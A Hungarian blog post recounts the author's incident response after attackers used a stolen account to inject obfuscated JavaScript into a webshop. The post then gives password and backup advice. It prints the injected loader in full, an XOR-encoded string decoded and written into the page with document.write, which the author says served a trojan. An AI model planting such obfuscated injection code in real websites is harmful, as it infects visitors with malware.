Vasárnap hajnalban telefonra ébredtem, az egyik dedikált gépes webshop megfeküdt, utána kéne járni. Érdekes, ilyenkor hihetetlen sebeséggel ébredek fel, a telefontól számított két perc elteltével már tudtam mi a baja.

Egy ázsiai adslről, az érvényes accounttal beléptek és kibővítették ezzel a javascripttel:


e = '0x00' + '6E';
str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A
%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96
%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B
%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D
%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D
%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C
%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89
%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B
%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";

str=tmp='';

for(i=0;i < str1.length; i+=3 ){
tmp = unescape(str1.slice(i,i+3));
str = str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);
}

document.write(str);


Szerencsére nem egy szokványos alkalmazásról beszélünk, bizonyos esetekben más-más headert küld le, rossz helyre pakolta magát, ráadásul helytelen szintaxissal. Amire megittam a reggeli kávém, már sikerült is visszafejteni. A Google szerint egy remek kis trójai látogatott meg minket, sokan más website mellet.

Már csak egy kérdést kell tisztáznunk: hogyan kerülhetett ki az account?

Némi faggatózás után kiderült, hogy az ügyfél egyik asztali gépe nem is olyan rég önálló életre kelt: levelezni kezdett a nagyvilágba.

Mi a tanulság az esetből?

• Ne tárolj életbevágóan fontos jelszavakat a gépeden, főleg ne az e-mail kliensedben, pláne ha a géped Windows.
• Ha már Windows, használj valami durva virusirtót, de legalábbis próbálj meg jobban odafigyelni a biztonságra.
• Ha a géped mégis levelezni kezdene, változtass meg a jelszavad.
• Ha mégis kikerül, legyen egy fizikailag szeparált, rendszeres backupod, amiből előhúzhatod a “működő” változatot, mint ahogy én tettem.

Mindenesetre az accountokat lecseréltem, kicsit átrendeztem a gépet. Aki a továbbiakban bármilyen siteot módosít, kezet csókolok neki. Csodálkoztam is volna, ha nem a jó öreg emberi tényezőn bukik meg a story. Szerencsére a pár perces leállást leszámítva nem történt igazi baj.

De azért dolgozik bennem a kisördög: vajon mi lett volna, ha az a napi 5-6000 látogató benyalja…

2007-08-29 12:24 | scriptkiddy, wörk | Peter